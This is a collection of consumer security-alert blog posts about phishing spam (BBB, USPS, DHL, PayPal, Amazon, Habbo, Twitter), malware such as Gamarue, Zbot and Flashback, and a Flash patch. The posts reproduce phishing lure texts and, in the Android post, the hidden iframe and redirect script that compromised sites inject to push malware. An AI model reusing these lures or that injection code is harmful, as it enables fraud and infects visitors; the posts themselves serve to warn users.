Thu, 10 May 2012 17:40:47 +1200

Hello,

Herewith the Better Business Bureau informs you that we have been sent a
complaint (ID ) from a customer of yours in regard to their dealership with
you.

Please open the COMPLAINT REPORT below to findthe details  on this question
and suggest us about your position as soon as possible.

We hope to hear from you shortly.

Kind regards,

Arnold Melendez

Dispute Counselor
Better Business Bureau

The attached file, named “BBB report.zip” contains malware that Microsoft Security Essentials detects as Gamarue.F, which is the same piece of malware currently being spread by DHL spam.

Once Gamarue.F infects your machine, it will edit Windows registry files to make sure it runs on system start up, connect to remote servers to download additional arbitrary files and copy itself to removable drives.

What Should You Do if You Receive a BBB Phishing Email?

The Better Business Bureau has offered the following advice to anyone that receives an email that looks like it is about a BBB complaint:

• Avoid clicking on any links or file attachments.


• Read the email carefully to pick up on any signs that it may be fake: poor grammar, spelling mistakes or use of generic greetings such as “Dear member” instead of your actual name.


• Delete the email from your computer completely by hitting the "delete" button and emptying your computer’s “trash can” or “recycling bin.”


• Keep your antivirus software current and run a full system scan.


• Contact your local BBB office if you’re not sure whether or not the email is authentic.


• Forward the email to the BBB’s security team at phishing@council.bbb.org . (Note: There’s no reason to resend the email if you receive a “bounce” message.)

Have you received any BBB spam?

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+.

Malware Hiding inside Files Attached to USPS Spam

Did you get an email from “USPS Mail” saying that they couldn’t deliver your package and you’ll have to retrieve it within 30 days to avoid penalty fees?

Cybercriminals are giving USPS impersonations another shot in order to plant malware on unsuspecting user machines, and unless the recipient’s computer is protected by 1 of the 7 antivirus programs that are capable of detecting the malware attached to the email, their efforts will definitely not be in vain.

The USPS spam messages, titled “Postal label contains detailed information” follow the typical USPS spam protocol, telling the user that there was a problem delivering a package and instructing them to download an attached file (in this case, Label_Parcel_ID2564US.zip) that supposedly contains the shipping label required to rectify the problem.

Here’s a copy of the USPS spam email:

Notification,

Our company’s courier couldn’t make the delivery of parcel.

Reason Postal code contains an error.
LOCATION OF YOUR PARCEL:KnoxvilleFort
DELIVERY STATUS: sort order
SERVICE: One-day Shipping
NUMBER OF YOUR PARCEL:U746093294 NU
FEATURES: No

Label is enclosed to the letter.
Print a label and show it at your post office.

An additional information:

If the parcel isn’t received within 30 working days our company will have the right to claim compensation from you for it's keeping in the amount of $8.26 for each day of keeping of it.

You can find the information about the procedure and conditions of parcels keeping in the nearest office.

Thank you for using our services.
USPS Global.

Should the recipient make the mistake of downloading and opening the file attached, their computer will become infected with an elusive piece of malware that Kaspersky identifies as Trojan-Dropper.Win32.Dapato.bcbf.

One alarming thing discovered about this piece of malware is that according to the scan report from VirusTotal, only 7/42 antivirus applications are capable of detecting Trojan-Dropper.Win32.Dapato.bcbf. Only computers running antivirus by F-Prot, TrendMicro (or TrendMicro Housecall), ClamAV, Kaspersky, Dr. Web, Commtouch will be spared from infection.

What to Do with USPS Spam

If you receive the email outlined above or another one like it (USPS spam is quite common) then it’s strongly recommended that you do the following:

• Avoid downloading or opening any attached files. (Don’t click on any links within the email either.)


• Delete the email immediately.

Have you received this USPS spam variant? There are a few of them floating around out there. Feel free to share your experience below!

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+.

Don’t Let the ‘Bad Rumors’ DM Phishing Scam Hijack Your Twitter Account

Oh no! Is someone spreading nasty rumors about you on Twitter?!

If you receive a direct message (DM) on Twitter claiming that there’s somebody out there that’s dragging your name in the dirt, don’t bother clicking on the link attached.

If you do, you will run the risk of having your Twitter account hijacked, your account turned into a spam-spewing tweet factory and all of your Twitter followers will be sent a personal copy of the same DM saying that someone is spreading lies about them.

Then they’ll click the link and have their credentials stolen, spam will begin flowing from their accounts and their followers will receive the same message, resulting in a never-ending cycle of Twitter account hijacking. Good job.

If any of this phishing scheme sounds familiar, it’s because this scam and others like it have been going around for quite some time now.

Reason being: they're all highly effective. Sure, the verbiage in the Twitter DMs may change periodically, but the goal of stealing your Twitter username and password stays the same. People simply cannot resist finding out what's so funny or checking out the bad blogs being written about them.

Here’s How the Twitter ‘Rumors’ Phishing Scheme Works

1. You login to Twitter and check your DMs, only to find that one of your Twitter pals sent one of the following messages with a TinyURL link attached to it:
   
   
   
   • Hey someone is saying nasty rumors about you… [LINK]
   
   
   • Hello some person is making really bad rumors about you.. [ LINK]
   
   
   • Hello this user is making some very bad rumors about you… [LINK]
   
   
   • Hello some person is posting horrible things about you… [LINK]
   
   
   • Hi somebody is making terrible rumors about you... [LINK]
   
   
   • I cant believe this but there are some real nasty things being said about you here [LINK]
   
   
   • Hey slut has been making up some nasty stories about you.. [LINK]
   
   
   • YO! someperson is making upsome some nasty lies about u [LINK]
   
   
   
   


2. Not wanting to have your reputation tarnished (or possibly suffering from a bad case of curiosity), you click on the link and you're redirected to a website that looks a lot like the Twitter login page (Tip: it’s not – check the screenshot provided).


3. Failing to realize the site is fake, you enter your Twitter login and password, which is sent off to the scammers.


4. Your account will begin spamming diet scams to all of your followers and all of your Twitter followers are sent the same misleading Twitter DM, which takes them to a Twitter login phishing page to steal their Twitter login as well.

What to Do if You Get a Phishing DM on Twitter

If you receive one of the phishing DMs shared above – and it’s likely that you will at some point – then it’s recommended that you do the following:

1. Refrain from clicking on the link included in the DM.


2. Report the DM to Twitter.


3. Delete the DM.

Have you received any of the “bad rumor” DMs on Twitter?

Also Read: What to Do When Your Twitter Account Has Been Compromised

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+.

Buy of the Week: Acer Veriton X4618G-Ui52320W Desktop PC for $646!

This offer expired on 5/11/12. Please check the ad at the top of the page for our current deal.

The compact Veriton X series desktops pack powerful components and advanced technologies to handle the most challenging office tasks.

These PCs also feature ample support and security for the company network. The modular, tool-less design makes accessibility easy, and energy efficient certifications signify cost savings and care for the environment.

For a limited time, you can order a Acer Veriton X4618G-Ui52320W desktop computer from Hyphenet for only $646, plus shipping!

Call Hyphenet at (619) 325-0990 to order your Acer Veriton X4618G-Ui52320W today!

Specifications for the Acer Veriton X4618G-Ui52320W

MFR#	PS.VCYP3.005
Processor	Intel Core i5 2320 / 3.3 GHz (Quad-Core)
RAM	4 GB DDR3 SDRAM - 1333MHz
Hard Drive	500 GB (7200 RPM)
Optical Drive	DVD±RW (±R DL) / DVD-RAM
Graphics Processor	Intel HD Graphics 2000 Dynamic Video Memory Technology 5.0
Networking	Network adapter - Ethernet, Fast Ethernet, Gigabit Ethernet
Interfaces	1 x network - Ethernet 10Base-T/100Base-TX/1000Base-T - RJ-45 10 x Hi-Speed USB - 4 pin USB Type A ( 4 front, 6 rear ) 1 x display / video - VGA - 15 pin HD D-Sub (HD-15) 1 x display / video - DVI-Digital - 24 pin digital DVI 1 x headphones - output - mini-phone stereo 3.5 mm ( 1 in front ) 1 x microphone - input - mini-phone 3.5 mm ( 1 in front ) 1 x keyboard - generic - 6 pin mini-DIN (PS/2 style) 1 x mouse - generic - 6 pin mini-DIN (PS/2 style) 3 x audio 1 x serial - RS-232 - 9 pin D-Sub (DB-9)
Operating System	Windows 7 Pro 64-bit
Keyboard/Mouse	USB Keyboard Optical mouse
Warranty	Limited 1-year warranty.

Don't miss out on this Buy of the Week! Call Hyphenet at (619) 325-0990 to order your Acer Veriton X4618G-Ui52320W today!

Buy of the Week offer valid through May 11th, 2012.

* Shipping and taxes apply.

This offer expired on 5/11/12. Please check the ad at the top of the page for our current deal.

DHL Spam Delivers Malware Right to Your Email Inbox

Stay on your guard, another round of DHL spam is hitting inboxes.

Why? To infect your computer with malware of course!

Yes, the real delivery associated with DHL spam is the Win32/Gamarue.F worm contained within the “DHL delivery ticket.zip” archive attached to the email.

Should Gamarue.F may its way onto your PC, it will connect to remote servers to download arbitrary files and spread to removable storage drives when the opportunity arises.

According to a VirusTotal email scan report, only 13/42 antivirus applications will detect the malware, so here’s to hoping you have one of them should you make the mistake of downloading and opening the file.

Thankfully it won’t be terribly difficult to spot the DHL spam emails if they’re anything like the two copies we got. Although the spam messages came from spoofed DHL.com email addresses (MaximilianGiannavola[AT]dhl.com & MeredithVink[AT]dhl.com), they were addressed to one of the other recipients, which were all visible in the “To:” field.

Here’s a copy of one of the emails we received:

Dear [EMAIL], with this message we notify you that shipment at your destination, tracking ID  #348175, has FAILED  due to an address mismatch. To claim your parcel please  print out the attached document and contact DHL US support

Feel free to contact us with any further questions.

If you would like to speak to a DHL Express Support Agent, please call the DHL Service Desk at 1-800-527-7298.

What to Do If You Receive DHL Spam

Did a DHL spam message like the one shown above arrive in your inbox? We advise you to do the following:

• Avoid downloading or opening any attached files.


• Delete the email immediately.

DHL is aware of the emails going around (after all, this is not the first batch to be sent) and have already posted an advisory notice on their website.

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+.

Adobe Issues Patch for Flash Player Security Flaw Actively Being Exploited in Targeted Attacks

Take a moment to update Adobe Flash today, folks.

Adobe has released important security updates for Adobe Flash Player to plug an object confusion vulnerability that could allow an attacker to crash the application and take control of the affected system.

Adobe warns that the security flaw is actively being exploited in targeted attacks against Flash Player on Internet Explorer for Windows.  The attacks are email-based and involve tricking the user into clicking on malicious files delivered in email messages.

Although the attacks target Flash Player for Internet Explorer on Windows, Adobe recommends that all Windows, OS X and Linux users update to Flash Player 11.2.202.235, Android  4.x users update to Flash Player 11.1.115.8, and Android 3.x and earlier update to Flash Player 11.1.111.9 since the vulnerability exists in previous Flash Player versions for those platforms as well.

Check What Version of Flash Player You Have

Users can check what version of Flash Player they currently have installed by:

1. Visiting the Adobe Flash Player page, or


2. Right-clicking on content running in Flash Player and select "About Adobe (or Macromedia) Flash Player" from the menu.

You will have to check the version for each separate browser if you didn’t opt for automatic silent updates (Google Chrome was updated automatically, so no user interaction is required). Keep in mind that the silent updates are only available for Windows at this time.

It is strongly recommended that Windows users update Flash Player immediately.

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+.

Paypal Payment Spam Links to Malicious Sites Serving Malware

You may be tempted to “click first, think later” when you receive a notice from PayPal saying you just sent payment to some random stranger, but is that email really from PayPal?

ZDNet warns that spammers are currently pushing out fake PayPal payment notices that are directing users to malicious sites that will attempt to exploit system vulnerabilities in order to plant malware on the visiting machine.

To make matters worse, only 17/42 antivirus programs detect the malware (MD5: 4f58895af2b8f89bd90092f08fcbd54f), which Sophos identifies as “Troj/Zbot-BTV” and McAfee detects as “PWS-Zbot.gen.ya,” according to a report from Virus Total.

Seeing the word "Zbot" should alarm you, as that's another alias for the infamous ZeuS banking Trojan that's well-known for its ability to steal sensitive login credentials and upload them to remote servers controlled by the attackers.

There's a good chance that many folks will be fooled by the bogus PayPal notifications too. The spammers have done a very good job making the spam emails look as authentic as possible (notice the spoofed sender's address: "PayPal", notify@paypal.com):

Email Screenshot Credit: ZDNET

What to Do if You Receive PayPal Spam

If you receive one of these spoofed PayPal emails, it’s recommended that you:

• Avoid clicking on any embedded links.


• Report the email to PayPal by forwarding it to spoof@paypal.com.


• Delete the email immediately.

On a side note, it’s always a good idea to type the URL of the website you wish to visit directly into your address bar versus clicking on email links to avoid malware attacks in the future.

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+.

Compromised Sites Serving Android Malware via Drive-by-Downloads

Compromised websites serving drive-by-downloads targeting PCs is not exactly new.

The risk of encountering malware is always present due to the simple fact that cybercriminals often hack websites and inject malicious code that will attempt to exploit system vulnerabilities within visiting machines in order to silently install malware.

In the past we’ve warned how a casual internet browsing session can easily lead to a malware infection, regardless of what computer operating system you use because of this.

But what about drive-by-downloads targeting mobile users?

It’s no secret that cybercrooks have taken a shine to creating mobile malware targeting the popular Android OS, although those are usually spread via unofficial Android marketplaces and third-party sites. Heck, some have even managed to sneak into the official Android Market (aka Google Play Store).

So, I guess it was only a matter of time before the bad guys began delivering Android malware using sites rigged with drive-by-downloads. And unfortunately, that time has come.

LookOut Mobile Security posted an alert on Wednesday, warning users of a new Android Trojan called “NotCompatible” that is being delivered via drive-by-downloads on compromised websites.

NotCompatible appears to serve as a simple TCP relay/proxy and although it doesn’t cause direct harm to the target device, it could “potentially be used to gain illicit access to private networks by turning the infected Android device into a proxy.”

The drive-by-download attack works like any other. Once a user visits a hacked site using their Android device, the NotCompatible application (filename “Update.apk”) will automatically be downloaded.

There is some good news, though. In order for the malicious app to be installed, the following conditions must be fulfilled:

1. The “Unknown Sources” setting to allow installation of non-Market apps must be enabled. (The feature is also known as “sideloading.”)


2. The user must agree to install the application.

If these requirements are not met, the attack will fail. So make sure you have left that “Unknown Sources” setting unchecked and you don’t go click-happy when prompted to install apps you don’t recall downloading.

LookOut reported that the following code is found at the bottom of infected sites serving NotCompatible:

<iframe
style=”visibility: hidden; display: none; display: none;”
src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”></iframe>


Interestingly enough, if a PC-based browser accesses the site at “gaoanalitics.info,” then a not found error is returned. It is only when a browser with the word “Android” in its user-agent header accesses the page that the following code is returned, triggering the malicious app download:

<html><head></head><body><script  type=”text/javascript”>window.top.location.href = “hxxp://androidonlinefix.info/fix1.php”;</script></body></html>

LookOut is still investigating the number of infected sites and the suspicious applications being served, but so far it appears that the sites hit so far show relatively low traffic. That's not to say the crooks behind this won't go after bigger game.

Stay safe, Android users!

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+.

Latest on Flashback Malware: The Malware’s Purpose, Current Botnet Size & Macs to Get Updates from Oracle

What’s the latest on the Flashback malware story?

The Motivation Behind Flashback Malware

Up until recently, it was only reported how many Macs had been infected with Flashback (aka Flashfake) without any say on what the malware actually did after making its way onto Apple machines.

According to Symantec researchers, Flashback was generating revenue for its authors via click fraud using an ad-clicking component that was loaded into Chrome, Firefox & Safari upon infection.

When the user went to conduct a search on Google, the malware would go to work by stealing clicks from paid Google ads:

Flashback specifically targets search queries made on Google and, depending on the search query, may redirect users to another page of the attacker's choosing, where they receive revenue from the click. (Google never receives the intended ad click.)

The ad click component parses out requests resulting from an ad click on Google Search and determines if it is on a whitelist. If not, it forwards the request to the malicious server in the following form:

http://[FLASHBACK_DOMAIN]/search?q=[QUERY]&ua=[USER AGENT]&al=[LANG]&cv=[VERSION]

Symantec researchers discovered that each hijacked click was valued around $0.08 for the attackers, which quickly added up given the number of infected machines.

Symantec estimated that Flashback was capable of easily earning the attackers upwards of $10,000 per DAY. I know Google can’t be happy about that, especially since the infected Macs can continue to make the cybercrooks money even if they’re not communicating with the command & control servers.

There is a bit of good news, though.

The Flashback Botnet is Shrinking!

Forbes reports that Dr. Web has provided new data indicating that around 100,000 Macs are dropping from the botnet per week, which is likely the result of users applying the system updates from Apple that remove the malware or installing antivirus software.

On top of that, new Flashback infections are said to have tapered off thanks to those same Apple updates patching the Java security hole that contributed to a large number of the infections.

Despite things moving slowly, Dr. Web’s chief executive, Boris Sharov estimates that in a month, it will all be over.

Oracle Will Provide Java Updates Directly to Mac

Malware aside, Ars Technica says that Oracle will begin deploying Java security updates directly to Mac OS X in addition to Windows, Linux and Solaris, allowing Mac users to get the updates directly from the source vs. waiting for Apple.

Oracle has already issued its first release for OS X users, although it's only for the Java Runtime Environment and not the Java browser plug-in or Web Start application.

And as noted by Ars Technica:

Until the Web plugin is available from Oracle, however, Mac users may still be vulnerable to attacks based on Java exploits. Users who don't update to Oracle's version and still rely on Apple's deprecated version, could face a similar security vulnerability. The good news is that Oracle offers automated update tools, so applying patches should be a no-brainer for Lion users and beyond from now on.

Oracle releases 4-6 updates for Java per year and plans on releasing a consumer version of Java SE 7, including the Java Runtime Environment (JRE) for OS X later this year.  (Read the related press release.)

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+.

Amazon Spam Generates Traffic for Illegal Drug Sites

Spammers are quite the magical beings.

Not only can they disguise the origin of an email, but they can also travel through time!

I’m only kidding, but it is an entertaining thought, especially if you’ve received a confirmation email from Amazon saying that an order placed tomorrow was canceled today.  Yes, you read that right.

Cybercrooks have begun spamming out yet another phony email in order to direct users to pharmaceutical websites. This time the emails are masquerading as Amazon cancellation notices:

From: order-update@amazon.com  (order-update@amazondestruct.com)
Subject: Your order 14-225-94971 has been successfully canceled

Your order has been successfully canceled. For your reference, here's a summary of your order:

You just canceled order 14-225-94971 placed on May 2, 2012.

Status: CANCELED

_____________________________________________________________________

1 "Micronesia"; 2008, Special Edition
By: Gwendolen Moore

Sold by: Amazon.com LLC

_____________________________________________________________________

Thank you for visiting Amazon.com!

---------------------------------------------------------------------

Amazon.com
Earth's Biggest Selection
http://www.amazon.com

--------------------------------------------------------------------

Clearly tinkering with time has knocked the spammer off their game, as the [canceled] order date is set for May 2nd when it's still only May 1st (at least where I live). Not only that, but the email arrived far too early - even with a forged header saying it arrived 7 hours later.

That’s aside from an item that could not be found on Amazon, but hey… I’m sure the cybercrook wasn’t expecting a recipient to spot such slip-ups.

What to do with Amazon Spam

If you happen to receive an email similar to the one shown above, it’s recommended that you:

1. Avoid clicking on any links.


2. Report the email to Amazon.


3. Delete the email.

Update 5/2/12: Since writing this, I've received two more of these emails, but with a different subject: "Amazon.com - Your Cancellation (XXX-XXX-XXXX). The rest of the email is pretty much the same with the exception of the item, which varies from email to email. How many of these emails have cluttered your inbox?

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+.

Pharmacy Spam Now Imitating Habbo Notification Emails

What’s this? More pharmacy spam disguised as a social network notification email?

What a surprise…

Since Friday, we’ve received two emails from “Habbo Hotel” (auto-contact@habbo.com) claiming that Habbo users “Carl” and “Alun” have sent us messages on the social networking site, which can be viewed as soon the huge, bright green “Read a message” button is clicked.

I’ll pass on the invitation, though, since a quick hover of the mouse reveals the spam’s links direct to a third-party website and not habbo.com.

Here’s one of the emails:

Subject: Habbo user “Alun” has sent you a message
From: Habbo Hotel (auto-correct@habbo.com)
Hello, [EMAIL]

Habbo user "Alun" has sent you a message.

Please click on the link below to open the Message View page:
hxxp://www.habbo.com/public_content/messages/a69d51a3e/read?userid=5735

Read a message

Keep me updated about the latest Habbo happenings, news and gossip. This message was sent to [EMAIL], if you do not want to receive emails from us anymore, click here.

FYI: The Habbo user’s name varies from email to email, so if you received one of these spam messages then it’s likely yours sports a different username. Still, the purpose of Habbo spam remains the same: trick as many people possible into visiting pharmaceutical websites.

If you are a Habbo user (or even if you’re not) and you receive an email purporting to be from the social networking site, make sure you mouseover email links to verify the destination URL before clicking on them.

If it doesn’t point to habbo.com, then you’re probably better off deleting the email.

In fact, you may want to make it common practice to check all email links before clicking them as spammers have also been sending out fake Foursquare, Myspace, YouTube, Tagged & LinkedIn emails as well.

Have you received any Habbo spam?